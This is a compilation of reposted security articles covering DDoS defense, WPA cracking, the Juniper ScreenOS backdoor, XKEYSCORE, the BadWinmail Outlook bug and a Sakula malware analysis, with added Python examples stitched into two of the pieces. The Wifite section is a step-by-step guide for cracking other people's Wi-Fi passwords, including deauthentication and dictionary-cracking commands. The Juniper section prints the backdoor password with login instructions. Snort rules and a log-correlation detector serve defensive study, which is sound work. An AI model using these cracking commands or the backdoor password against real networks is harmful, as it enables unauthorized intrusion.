Flexible DDoS Defense: Bohatei

Bohatei is a first-of-its-kind platform that enables flexible and elastic DDoS defense using SDN and NFV.

The backend folder consists of:

  • an implementation of the FlowTags framework for the OpenDaylight controller
  • an implementation of the resource management algorithms
  • a topology file that was used to simulate an ISP topology
  • scripts that facilitate functions such as spawning, tearing down and retrieving the topology
  • scripts that automate and coordinate the components required for the use cases examined

White paper is available here.

The frontend folder contains the required files for the web interface.

For the experiments performed, the team used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools used for those strategy graphs are the following:

  • Bro
  • Snort
  • Balancer
  • Iptables
  • Iperf
  • Custom scripts to simulate the attacks 

You may download it here.

Original Post: http://www.hackinsight.org/news,533.html

How to Crack WPA/WPA2 with Wifite

Hi there again, aspiring hackers (and veterans as well)! I’m going to explain how to perform a dictionary attack on a WPA/WPA2 protected network with Wifite. Please note that this doesn’t work with WPA Enterprise. For that, you’d have to use an Evil Twin to get the “Enterprise” auth attempt, and then crack it. But don’t worry, Enterprise isn’t common in many corporations, and I still haven’t seen it on any home network. That being said, let’s get started.

Step 1: Get Ready Your Dictionary File

First, we’re gonna need a dictionary, to perform the dictionary attack. If the network you’re attacking has WPS enabled, you may attempt to get the password that way first.

In Kali, you have a nice wordlist that comes bundled within your installation/live usb. It’s located in /usr/share/wordlists, but it comes compressed in .gz format (at least in the live version).

To get it ready for the attack, we need to type:

gzip -d /usr/share/wordlists/rockyou.txt.gz

And within seconds it’ll be extracted and ready to use.

Backtrack has them located in /pentest/passwords/wordlists. It has one that’s called darkc0de.lst along with the rockyou.txt one.

You can use them by simply copying one of these after the ‘-dict’ option.

/pentest/passwords/wordlists/rockyou.txt
/pentest/passwords/wordlists/darkc0de.lst

For any other distros, search for “download wordlist rockyou” or “download wordlist darkc0de”, or just “download wordlist” in DuckDuckGo. It gives more precise results than Google for this kind of stuff.

For the rest of this, I’ll assume that you’re using Kali.

Step 2: Launch Wifite

To launch Wifite, you must be running with root permissions.

In a live Kali boot, you are logged on by default as the root user. If you leave it running for a while (while cracking with the dictionary, presumably) and it asks for a password to return to the session, it’s ‘toor’ (root backwards).

Same for BackTrack (confirmation needed), and for other distros you can gain root access by typing “su” or “sudo su” and entering the password. The first command requires you to know root’s password, and the second your current account’s and it must have root privileges.

TL;DR? Okay, you just want the command? Here it is!

wifite -mac -aircrack -dict /usr/share/wordlists/rockyou.txt

-mac | Anonymizes your MAC address by randomizing it (the adapter mustn’t already be in monitor mode, or this option won’t work).

-aircrack | Tells Wifite we’ll be doing an Aircrack only attack.

-dict | Select a dictionary to use for cracking the password after capturing the handshake, otherwise you’ll get the ‘.cap’ file and Wifite will terminate.

I have it located in a different folder because I’m not running Kali, but it’s pretty much the same.

Step 3: Select Your Wireless Adapter and Your Target

If you have a laptop with an external USB adapter, you’ll probably have to choose which adapter to use. Please note that you’ll need a compatible adapter that’s able to inject packets and enter monitor mode, or this won’t work.

If prompted, we select our adapter by choosing the number Wifite has assigned it. In my case, I’ll type ‘1’, because that’s mine. One good indicator for knowing which one it is, is reading the name to the left of ‘phy’. For example, I have one that says ‘usb’ in it, and one that doesn’t. And yep, I have it plugged into USB, so that one’s it.

Now we’ll see a list of wireless networks, and if we let it run, it will eventually display ‘client’ or ‘clients’ at the top right of the network info, showing that it has a client (or more) connected to it.

To stop the scan, press Ctrl+C. I’ll choose “Casa” (Spanish for house).

Step 4: Sit and Wait

If the network you’re attempting to crack has WPS enabled, it’ll start cracking it that way first. To stop it, just press Ctrl+C.

Now it will attempt to capture the handshake for a few minutes.

If no clients are connected, it’ll send a general deauth to the wireless adapter, so that clients may show up.

If it detects a client connected to the network, it’ll tell you its MAC address, and proceed to send targeted deauths to that client.

When it succeeds in deauthenticating a client (which has auto-reconnect enabled by default), or a new client connects to the network, hopefully it will capture the handshake, and it’ll start attempting to crack it with aircrack-ng and the dictionary file you gave it.

If the passphrase is any of the words contained in that dictionary, it’ll stop and show it on screen. Otherwise, it’ll run through the whole dictionary, and say it couldn’t find the key. But it has a nice success rate.

I used my country in lowercase letters as the passphrase (argentina), and as it’s along the first words in this dictionary, it took only one second to crack it. For you it may take over an hour or two, depending on your processing power and if the passphrase is near the beginning or the end of the list.

Wifite Succeeded but Failed!

If it failed, you still get the ‘.cap’ file (hopefully not empty).

You can use that file with the same dictionary (or others) with aircrack-ng, using this command:

aircrack-ng -w <location of dictionary> <location of your .cap file>

In Kali live, ‘.cap’ files get saved into a folder named ‘hs’ inside the directory you’re working in.

After Wifite has ended, type:

ls ./hs

To see your ‘.cap’ files and other files for cracking.

Some More Words

Well, that’s pretty much it. I hope you may find it helpful, but remember to look at OTW’s guides on wireless cracking to know exactly what this script is doing, so you may tweak it further or play with its options for more effectiveness (type ‘wifite --help’ to see its options).

Should I write a guide on how to install this script on a non-kali machine? It’s pretty illuminating about which programs it uses for which purpose…

Original Post: http://null-byte.wonderhowto.com/how-to/crack-wpa-wpa2-with-wifite-0161976/

Who planted the Juniper ScreenOS Authentication Backdoor?

Who planted the authentication backdoor in Juniper ScreenOS? Security experts are speculating, and interesting revelations are coming out.

While the FBI is investigating the case, searching for those responsible for the introduction of a backdoor in a number of Juniper network devices, a number of speculations are circulating on the Internet. Juniper Networks is a technology provider for the US Government and many US federal agencies, including the FBI; this means that attackers may have had access to the traffic of connections protected through VPNs.

Some blame China, others the NSA, and the majority point to a more generic nation-state actor.

The experts who blame the Chinese Government maintain that the compromised appliance was originally developed by NetScreen Technologies, a company acquired by Juniper Networks in 2004. NetScreen Technologies was founded by Chinese nationals, and for this reason some experts believe that Chinese experts have a deep knowledge of the compromised ScreenOS.

“It’s not hard to find evidence of ongoing work on ScreenOS in Beijing: a quick trawl of LinkedIn turns up several Juniper employees who work on the operating system. The Register in no way suggests that those who work in Juniper’s Beijing offices are in any way associated with the unauthorised code. We nonetheless asked Juniper if the code is known to have come from the Beijing facility.” states a blog post published by The Register.

Many experts speculate on the involvement of the NSA: one of the documents leaked by Edward Snowden and published by the German magazine Der Spiegel revealed that US intelligence had the ability to plant a backdoor in various network equipment, including Juniper firewalls.

[image: NSA Juniper implant]

There is also speculation that the two backdoors might not be the work of the same state actor, as they are not connected.

According to the German online magazine, hackers belonging to the ANT division (Advanced or Access Network Technology), operating under the NSA’s department for Tailored Access Operations (TAO), 

“In the case of Juniper, the name of this particular digital lock pick is “FEEDTROUGH.” This malware burrows into Juniper firewalls and makes it possible to smuggle other NSA programs into mainframe computers. Thanks to FEEDTROUGH, these implants can, by design, even survive “across reboots and software upgrades.” In this way, US government spies can secure themselves a permanent presence in computer networks. The catalog states that FEEDTROUGH “has been deployed on many target platforms.” states the Der Spiegel online.

HD Moore, the developer of Rapid7’s Metasploit Framework, confirmed that roughly 26,000 Netscreen devices are exposed on the Internet with SSH open.

“Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.” he wrote in a blog post.

HD Moore added that the authentication backdoor might date back to late 2013, and the encryption backdoor to 2012.

“This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).”

Ronald Prins, founder and CTO of Fox-IT, a Dutch security firm, explained that by reverse engineering the patch released by Juniper he was able to discover the backdoor master password (“<<< %s(un=’%s’) = %u,“).

“Once you know there is a backdoor there, … the patch [Juniper released] gives away where to look for [the backdoor] … which you can use to log into every [Juniper] device using the Screen OS software,” Prins told WIRED. “We are now capable of logging into all vulnerable firewalls in the same way as the actors [who installed the backdoor].”

Fox-IT has also released Snort rules that sysadmins can use to detect unauthorized access to Juniper devices through the backdoor.

“Since our initial announcement we’ve learned that the number of versions of ScreenOS affected by each of the issues is more limited than originally believed. Administrative Access (CVE-2015-7755) only affects ScreenOS 6.3.0r17 through 6.3.0r20. VPN Decryption (CVE-2015-7756) only affects ScreenOS 6.2.0r15 through 6.2.0r18 and 6.3.0r12 through 6.3.0r20,” Juniper reported, inviting administrators to apply the security updates as soon as possible.

The only certainty is that someone deliberately inserted a backdoor password into Juniper network devices.

Original post: http://securityaffairs.co/wordpress/42971/hacking/juniper-screenos-authentication-backdoor.html

CVE-2015-7755: Juniper ScreenOS Authentication Backdoor

On December 18th, 2015 Juniper issued an advisory indicating that they had discovered unauthorized code in the ScreenOS software that powers their Netscreen firewalls. This advisory covered two distinct issues: a backdoor in the VPN implementation that allows a passive eavesdropper to decrypt traffic, and a second backdoor that allows an attacker to bypass authentication in the SSH and Telnet daemons. Shortly after Juniper posted the advisory, an employee of Fox-IT stated that they were able to identify the backdoor password in six hours. A quick Shodan search identified approximately 26,000 internet-facing Netscreen devices with SSH open. Given the severity of this issue, we decided to investigate.

Juniper’s advisory mentioned that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected. Juniper provided a new 6.2.0 and 6.3.0 build, but also rebuilt older packages that omit the backdoor code. The rebuilt older packages have the “b” suffix to the version and have a minimal set of changes, making them the best candidate for analysis. In order to analyze the firmware, it must be unpacked and then decompressed. The firmware is distributed as a ZIP file that contains a single binary. This binary is a decompression stub followed by a gzip-compressed kernel. The x86 images can be extracted easily with binwalk, but the XScale images require a bit more work. ScreenOS is not based on Linux or BSD, but runs as a single monolithic kernel. The SSG500 firmware uses the x86 architecture, while the SSG5 and SSG20 firmware uses the XScale (ARMB) architecture. The decompressed kernel can be loaded into IDA Pro for analysis. As part of the analysis effort, we have made decompressed binaries available in a GitHub repository.

Although most folks are more familiar with x86 than ARM, the ARM binaries are significantly easier to compare due to minimal changes in the compiler output. In order to load the SSG5 (ssg5ssg20.6.3.0r19.0.bin) firmware into IDA, the ARMB CPU should be selected, with a load address of 0x80000 and a file offset of 0x20. Once the binary is loaded, it helps to identify and tag common functions. Searching for the text “strcmp” finds a static string that is referenced in the sub_ED7D94 function. Looking at the strings output, we can see some interesting string references, including auth_admin_ssh_special and auth_admin_internal. Searching for “auth_admin_internal” finds the sub_13DBEC function. This function has a “strcmp” call that is not present in the 6.3.0r19b firmware:

[screenshot: ssh.png]

The argument to the strcmp call is <<< %s(un=’%s’) = %u, which is the backdoor password, and was presumably chosen so that it would be mistaken for one of the many other debug format strings in the code. This password allows an attacker to bypass authentication through SSH and Telnet. If you want to test this issue by hand, telnet or ssh to a Netscreen device, specify any username, and the backdoor password. If the device is vulnerable, you should receive an interactive shell with the highest privileges.

The interesting thing about this backdoor is not the simplicity, but the timing. Juniper’s advisory claimed that versions 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 were affected, but the authentication backdoor is not actually present in older versions of ScreenOS. We were unable to identify this backdoor in versions 6.2.0r15, 6.2.0r16, 6.2.0r18 and it is probably safe to say that the entire 6.2.0 series was not affected by this issue (although the VPN issue was present). We were also unable to identify the authentication backdoor in versions 6.3.0r12 or 6.3.0r14. We could confirm that versions 6.3.0r17 and 6.3.0r19 were affected, but were not able to track down 6.3.0r15 or 6.3.0r16. This is interesting because although the first affected version was released in 2012, the authentication backdoor did not seem to get added until a release in late 2013 (either 6.3.0r15, 6.3.0r16, or 6.3.0r17).

Detecting the exploitation of this issue is non-trivial, but there are a couple of things you can do. Juniper provided guidance on what the logs from a successful intrusion would look like:

2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from …..

2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user ‘username2’ at host …

Although an attacker could delete the logs once they gain access, any logs sent to a centralized logging server (or SIEM) would be captured, and could be used to trigger an alert.

Fox-IT has created a set of Snort rules that can detect access with the backdoor password over Telnet and fire on any connection to a ScreenOS Telnet or SSH service:

# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH. 

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)

alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)

alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)

alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)
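As an added example (not code from Rapid7, Fox-IT or Juniper), the following Python script applies the two pieces of detection guidance above offline. It correlates the 00515 and 00528 events from Juniper's sample lines over a few constructed log lines, flagging a logon whose 00515 event names 'system' or whose 00528 username disagrees with the 00515 username (that reading of the two sample lines is this example's assumption), and it decodes the hex content match from the Fox-IT telnet rule to confirm that it is the backdoor string named in the post. The log layout beyond Juniper's two lines, the field names and the sample addresses are constructed.

```python
import re
from collections import defaultdict

# Regexes for the two ScreenOS event IDs Juniper's guidance lists (00515 admin
# logon, 00528 password authentication). The field layout follows the two
# sample lines; the trailing address format is an assumption.
RE_LOGON = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) system warn 00515 "
    r"Admin user (?P<user>\S+) has logged on via (?P<proto>\S+) from (?P<host>[\d.]+)"
)
RE_AUTH = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) system warn 00528 "
    r"(?P<proto>\S+): Password authentication successful for admin user "
    r"'(?P<user>[^']*)' at host (?P<host>[\d.]+)"
)


def parse_event(line):
    """Return a dict for a 00515/00528 event, or None for any other line."""
    for event_id, rx in (("00515", RE_LOGON), ("00528", RE_AUTH)):
        m = rx.match(line)
        if m:
            return {"event": event_id, **m.groupdict()}
    return None


def find_suspicious_logons(lines):
    """Correlate 00515 and 00528 events per source host.

    A logon is flagged when its 00515 event names 'system' as the admin user,
    or when a 00528 event from the same host names a different user than the
    00515 event does. Both heuristics are this example's reading of Juniper's
    sample lines, not vendor-published detection logic.
    """
    by_host = defaultdict(lambda: {"00515": [], "00528": []})
    for line in lines:
        ev = parse_event(line)
        if ev:
            by_host[ev["host"]][ev["event"]].append(ev)

    findings = []
    for host, events in by_host.items():
        for logon in events["00515"]:
            reasons = []
            if logon["user"] == "system":
                reasons.append("00515 logon recorded for user 'system'")
            for auth in events["00528"]:
                if auth["user"] != logon["user"]:
                    reasons.append(
                        f"00528 user {auth['user']!r} differs from 00515 user {logon['user']!r}"
                    )
            if reasons:
                findings.append({"host": host, "ts": logon["ts"], "reasons": reasons})
    return findings


# The |hex| content match from the Fox-IT telnet backdoor rule (sid 21001730).
SNORT_CONTENT_HEX = "3c3c3c20257328756e3d2725732729203d202575"


def snort_content_to_text(hex_content):
    """Decode a Snort hex content match into the ASCII string it looks for."""
    return bytes.fromhex(hex_content).decode("ascii")


# Constructed sample log lines modelled on Juniper's guidance; addresses are
# documentation ranges, not real hosts.
SAMPLE_LOG = [
    "2015-12-17 09:00:00 system warn 00515 Admin user system has logged on via SSH from 198.51.100.7:41022",
    "2015-12-17 09:00:00 system warn 00528 SSH: Password authentication successful for admin user 'username2' at host 198.51.100.7",
    "2015-12-17 09:05:12 system warn 00515 Admin user netscreen has logged on via SSH from 192.0.2.10:50011",
    "2015-12-17 09:05:12 system warn 00528 SSH: Password authentication successful for admin user 'netscreen' at host 192.0.2.10",
    "2015-12-17 09:06:00 system info 00002 Some unrelated event",
]

if __name__ == "__main__":
    for f in find_suspicious_logons(SAMPLE_LOG):
        print(f"{f['ts']} {f['host']}: " + "; ".join(f["reasons"]))
    print("Snort content decodes to:", snort_content_to_text(SNORT_CONTENT_HEX))
```

Run against a SIEM export, only the first host is flagged: its 00515 event names 'system' while the 00528 event carries the arbitrary username the attacker typed, whereas the legitimate 'netscreen' logon produces a consistent pair.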

Robert Nunley has created a set of Sagan rules for this issue:

If you are trying to update a ScreenOS system and are running into issues with the signing key, take a look at Steve Puluka’s blog post.

We would like to thank Ralf-Philipp Weinmann of Comsecuris for his help with unpacking and analyzing the firmware and Maarten Boone of Fox-IT for confirming our findings and providing the Snort rules above.

Update: Fox-IT reached out and confirmed that *any* username can be used via Telnet or SSH with the backdoor password, regardless of whether it is valid or not.

Update: Juniper has confirmed that the authentication backdoor only applies to revisions 6.3.0r17, 6.3.0r18, 6.3.0r19, and 6.3.0r20.

Update: Details on CVE-2015-7756 have emerged. The Wired article provides a great overview as well.

Original Post: https://community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor

Behind the Curtain: A Look at the Inner Workings of NSA’s XKEYSCORE

Second in a series. Part 1 here.

The sheer quantity of communications that XKEYSCORE processes, filters and queries is stunning. Around the world, when a person gets online to do anything — write an email, post to a social network, browse the web or play a video game — there’s a decent chance that the Internet traffic her device sends and receives is getting collected and processed by one of XKEYSCORE’s hundreds of servers scattered across the globe.

In order to make sense of such a massive and steady flow of information, analysts working for the National Security Agency, as well as partner spy agencies, have written thousands of snippets of code to detect different types of traffic and extract useful information from each type, according to documents dating up to 2013. For example, the system automatically detects if a given piece of traffic is an email. If it is, the system tags if it’s from Yahoo or Gmail, if it contains an airline itinerary, if it’s encrypted with PGP, or if the sender’s language is set to Arabic, along with myriad other details.

This global Internet surveillance network is powered by a somewhat clunky piece of software running on clusters of Linux servers. Analysts access XKEYSCORE’s web interface to search its wealth of private information, similar to how ordinary people can search Google for public information.

Based on documents provided by NSA whistleblower Edward Snowden, The Intercept is shedding light on the inner workings of XKEYSCORE, one of the most extensive programs of mass surveillance in human history.

How XKEYSCORE works under the hood

It is tempting to assume that expensive, proprietary operating systems and software must power XKEYSCORE, but it actually relies on an entirely open source stack. In fact, according to an analysis of an XKEYSCORE manual for new systems administrators from the end of 2012, the system may have design deficiencies that could leave it vulnerable to attack by an intelligence agency insider.

XKEYSCORE is a piece of Linux software that is typically deployed on Red Hat servers. It uses the Apache web server and stores collected data in MySQL databases. File systems in a cluster are handled by the NFS distributed file system and the autofs service, and scheduled tasks are handled by the cron scheduling service. Systems administrators who maintain XKEYSCORE servers use SSH to connect to them, and they use tools such as rsync and vim, as well as a comprehensive command-line tool, to manage the software.

John Adams, former security lead and senior operations engineer for Twitter, says that one of the most interesting things about XKEYSCORE’s architecture is “that they were able to achieve so much success with such a poorly designed system. Data ingest, day-to-day operations, and searching is all poorly designed. There are many open source offerings that would function far better than this design with very little work. Their operations team must be extremely unhappy.”

Analysts connect to XKEYSCORE over HTTPS using standard web browsers such as Firefox. Internet Explorer is not supported. Analysts can log into the system with either a user ID and password or by using public key authentication.

As of 2009, XKEYSCORE servers were located at more than 100 field sites all over the world. Each field site consists of a cluster of servers; the exact number differs depending on how much information is being collected at that site. Sites with relatively low traffic can get by with fewer servers, but sites that spy on larger amounts of traffic require more servers to filter and parse it all. XKEYSCORE has been engineered to scale in both processing power and storage by adding more servers to a cluster. According to a 2009 document, some field sites receive over 20 terabytes of data per day. This is the equivalent of 5.7 million songs, or over 13 thousand full-length films.

This map from a 2009 top-secret presentation does not show all of XKEYSCORE’s field sites.

When data is collected at an XKEYSCORE field site, it is processed locally and ultimately stored in MySQL databases at that site. XKEYSCORE supports a federated query system, which means that an analyst can conduct a single query from the central XKEYSCORE website, and it will communicate over the Internet to all of the field sites, running the query everywhere at once.

There might be security issues with the XKEYSCORE system itself as well. As hard as software developers may try, it’s nearly impossible to write bug-free source code. To compensate for this, developers often rely on multiple layers of security; if attackers can get through one layer, they may still be thwarted by other layers. XKEYSCORE appears to do a bad job of this.

When systems administrators log into XKEYSCORE servers to configure them, they appear to use a shared account, under the name “oper.” Adams notes, “That means that changes made by an administrator cannot be logged.” If one administrator does something malicious on an XKEYSCORE server using the “oper” user, it’s possible that the digital trail of what was done wouldn’t lead back to the administrator, since multiple operators use the account.

There appears to be another way an ill-intentioned systems administrator may be able to cover their tracks. Analysts wishing to query XKEYSCORE sign in via a web browser, and their searches are logged. This creates an audit trail, on which the system relies to assure that users aren’t doing overly broad searches that would pull up U.S. citizens’ web traffic. Systems administrators, however, are able to run MySQL queries. The documents indicate that administrators have the ability to directly query the MySQL databases, where the collected data is stored, apparently bypassing the audit trail.

AppIDs, fingerprints and microplugins

Collecting massive amounts of raw data is not very useful unless it is collated and organized in a way that can be searched. To deal with this problem, XKEYSCORE extracts and tags metadata and content from the raw data so that analysts can easily search it.

This is done by using dictionaries of rules called appIDs, fingerprints and microplugins that are written in a custom programming language called GENESIS. Each of these can be identified by a unique name that resembles a directory tree, such as “mail/webmail/gmail,” “chat/yahoo,” or “botnet/blackenergybot/command/flood.”

One document detailing XKEYSCORE appIDs and fingerprints lists several revealing examples. Windows Update requests appear to fall under the “update_service/windows” appID, and normal web requests fall under the “http/get” appID. XKEYSCORE can automatically detect Airblue travel itineraries with the “travel/airblue” fingerprint, and iPhone web browser traffic with the “browser/cellphone/iphone” fingerprint.

PGP-encrypted messages are detected with the “encryption/pgp/message” fingerprint, and messages encrypted with Mojahedeen Secrets 2 (a type of encryption popular among supporters of al Qaeda) are detected with the “encryption/mojaheden2” fingerprint.

When new traffic flows into an XKEYSCORE cluster, the system tests the intercepted data against each of these rules and stores whether the traffic matches the pattern. A slideshow presentation from 2010 says that XKEYSCORE contains almost 10,000 appIDs and fingerprints.

AppIDs are used to identify the protocol of traffic being intercepted, while fingerprints detect a specific type of content. Each intercepted stream of traffic gets assigned up to one appID and any number of fingerprints. You can think of appIDs as categories and fingerprints as tags.

If multiple appIDs match a single stream of traffic, the appID with the lowest “level” is selected (appIDs with lower levels are more specific than appIDs with higher levels). For example, when XKEYSCORE is assessing a file attachment from Yahoo mail, all of the appIDs in the following slide will apply, however only “mail/webmail/yahoo/attachment” will be associated with this stream of traffic.

To tie it all together, when an Arabic speaker logs into a Yahoo email address, XKEYSCORE will store “mail/yahoo/login” as the associated appID. This stream of traffic will match the “mail/arabic” fingerprint (denoting language settings), as well as the “mail/yahoo/ymbm” fingerprint (which detects Yahoo browser cookies).
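To make the appID/fingerprint semantics described above concrete, here is an added Python model. It is not GENESIS and not code from the documents: appIDs carry a level and only the lowest-level match is kept as the stream's single category, while every matching fingerprint is attached as a tag. The rule names come from the article; the levels, the predicates (Host header suffixes, an Accept-Language prefix, a cookie named YMBM) and the two sample sessions are this example's assumptions.

```python
from dataclasses import dataclass
from typing import Callable, List, Optional, Tuple


@dataclass(frozen=True)
class Rule:
    """One appID or fingerprint: a name, a predicate over a parsed session and,
    for appIDs only, a level (lower level = more specific)."""
    name: str
    matches: Callable[[dict], bool]
    level: Optional[int] = None


def _hdr(session: dict, name: str) -> str:
    return session.get("headers", {}).get(name, "")


# appIDs are categories. Names are from the article; the levels and the
# predicates are assumptions about how such a hierarchy could be expressed.
APPIDS = [
    Rule("http/get", lambda s: s["proto"] == "http" and s["method"] == "GET", level=9),
    Rule("mail/webmail/yahoo",
         lambda s: s["proto"] == "http" and _hdr(s, "Host").endswith("mail.yahoo.com"), level=5),
    Rule("mail/yahoo/login",
         lambda s: s["proto"] == "http" and _hdr(s, "Host").endswith("mail.yahoo.com")
         and s["path"].startswith("/login"), level=3),
    Rule("update_service/windows",
         lambda s: _hdr(s, "Host").endswith("windowsupdate.com"), level=4),
]

# fingerprints are tags; any number may match. The YMBM cookie name and the
# Accept-Language test are assumptions standing in for the real rule bodies.
FINGERPRINTS = [
    Rule("mail/arabic", lambda s: _hdr(s, "Accept-Language").lower().startswith("ar")),
    Rule("mail/yahoo/ymbm", lambda s: "YMBM=" in _hdr(s, "Cookie")),
    Rule("browser/cellphone/iphone", lambda s: "iPhone" in _hdr(s, "User-Agent")),
    Rule("encryption/pgp/message",
         lambda s: "-----BEGIN PGP MESSAGE-----" in s.get("body", "")),
]


def classify(session: dict) -> Tuple[Optional[str], List[str]]:
    """Assign at most one appID (the lowest-level match wins) and every
    matching fingerprint, mirroring the 'categories vs tags' description."""
    matching = [r for r in APPIDS if r.matches(session)]
    appid = min(matching, key=lambda r: r.level).name if matching else None
    fingerprints = sorted(r.name for r in FINGERPRINTS if r.matches(session))
    return appid, fingerprints


# Constructed sessions, not captured traffic: the article's Arabic-speaking
# Yahoo login (as a GET so that three appIDs compete) and a plain page fetch.
YAHOO_LOGIN = {
    "proto": "http", "method": "GET", "path": "/login",
    "headers": {
        "Host": "login.mail.yahoo.com",
        "Accept-Language": "ar-SA,ar;q=0.8",
        "Cookie": "YMBM=constructed-sample-value",
        "User-Agent": "Mozilla/5.0 (iPhone; constructed)",
    },
    "body": "",
}
PLAIN_GET = {
    "proto": "http", "method": "GET", "path": "/index.html",
    "headers": {"Host": "www.example.com", "User-Agent": "curl"},
    "body": "",
}

if __name__ == "__main__":
    for name, session in (("yahoo login", YAHOO_LOGIN), ("plain GET", PLAIN_GET)):
        appid, tags = classify(session)
        print(f"{name}: appID={appid} fingerprints={tags}")
```

For the Yahoo session all three of http/get, mail/webmail/yahoo and mail/yahoo/login apply, but only mail/yahoo/login (the lowest level) is stored, while the language, cookie and device fingerprints are all kept as tags.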

Sometimes the GENESIS programming language, which largely relies on Boolean logic, regular expressions and a set of simple functions, isn’t powerful enough to do the complex pattern-matching required to detect certain types of traffic. In these cases, as one slide puts it, “Power users can drop in to C++ to express themselves.” AppIDs or fingerprints that are written in C++ are called microplugins.

Here’s an example of a microplugin fingerprint for “botnet/conficker_p2p_udp_data,” which is tricky botnet traffic that can’t be identified without complicated logic. A botnet is a collection of hacked computers, sometimes millions of them, that are controlled from a single point.

Here’s another microplugin that uses C++ to inspect intercepted Facebook chat messages and pull out details like the associated email address and body of the chat message.

One document from 2009 describes in detail four generations of appIDs and fingerprints, which begin with only the ability to scan intercepted traffic for keywords, and end with the ability to write complex microplugins that can be deployed to field sites around the world in hours.

If XKEYSCORE development has continued at a similar pace over the last six years, it’s likely considerably more powerful today.

Illustration for The Intercept by Blue Delliquanti

Original Post: https://theintercept.com/2015/07/02/look-under-hood-xkeyscore/

New Bug Lets Attacker Takeover PC via Outlook Email

This bug was discovered by security researcher Haifei Li, who named it BadWinmail. His technical report suggests the vulnerability is very easy to exploit and doesn’t require much interaction from the Outlook user.

The user is only required to view the mail that contains the malicious Flash file; once it is viewed, the attacker is in.

Flash- the main culprit!

The main problem is with Flash, which already has several known issues and is supported via Object Linking and Embedding (OLE), which allows any type of object to be embedded inside Office documents. With Flash vulnerable and a flaw in Outlook’s sandboxing, this had to happen.

Once a user opens the malicious email, the OLE mechanism loads the Flash file inside the email for preview; here the security sandboxing vulnerability is exploited and the user gets infected by the malicious Flash file attached to the mail. The user is not required to download it.

It gets worse

What’s worse about this Badwinmail attack is that it allows attackers to install more malicious material on the user’s system. According to the researcher:

“IT’S ALSO A WORMABLE ISSUE RARELY SEEN ON WINDOWS PLATFORM NOWADAYS.”

This type of attack is popular with APT groups and cyber-espionage agencies that focus on smaller, individual targets. So, for all Outlook users it is important to install the security patch Microsoft sent out on December 9th to keep their systems secure.

Below is a video demonstration of the attack:

Original Post: https://www.hackread.com/bug-lets-attacker-takeover-pc-via-outlook-email/

Malware Sakula – Evolutions v2.x-3.x (Part 2)

This post is the second part of an article on the Sakula malware. It follows the first one, available here, and covers versions 2.x and 3.x.

It provides a lot of technical detail to follow Sakula’s evolution. Some parts of the article can be a bit long to read, but putting constants, paths, algorithms and other indicators in it is useful for reversers when they google some artefacts.

Once again, for those who are not necessarily interested in the technical stuff, you can directly access the Yara rules which identify all known versions 2.x and 3.x of Sakula here.

Type   Version        Seen         Target’s activity *
RAT    Sakula 2.0     11/07/2013
RAT    Sakula 2.1     16/07/2013   Aerospace
RAT    Sakula 2.2     24/09/2013
RAT    Sakula 3.0a    07/01/2014
RAT    Sakula 3.0b    27/02/2014
RAT    Sakula 3.1a    16/05/2014
RAT    Sakula 3.1b    09/07/2014   Healthcare
RAT    Sakula 3.1c    10/07/2014   Healthcare
RAT    Sakula 3.1d    18/09/2014   Government
RAT    Sakula 3.2     09/01/2015

* The target’s activity is only inferred from the campaign ID found in the binaries; even if some of them are quite explicit, they cannot be taken as direct evidence.

Version 2.0 to 2.2

Versions 2.x bring some minor features but essentially implement protection mechanisms through the use of droppers, packers, stolen certificates and a DLL hijacking vulnerability.

After analysis, it appears that versions 2.x and 3.x both evolved from v1 (i.e. v3 does not follow v2), as the v2 updates are not present in v3.

v2.0 (11/07/2013)

The RAT has multiple layers of protection:

  • it is packed by UPX
  • it is embedded in a custom shellcode PE loader
  • it is embedded in a dropper

blackvinev2_0_arch2.png

The dropper is a simple executable which:

  • extracts the payload located after the last section of the binary file
  • decrypts it using a single-byte XOR encryption (key=0x33)
  • executes it by jumping (JMP) to it

The custom PE loader is designed as a shellcode which:

  • loads the imports it needs through a custom GetProcAddress routine:
    • get the PEB (Process Environment Block) structure's address (from FS:[0x30])
    • get the LDR (PEB_LDR_DATA) structure's address (from the PEB)
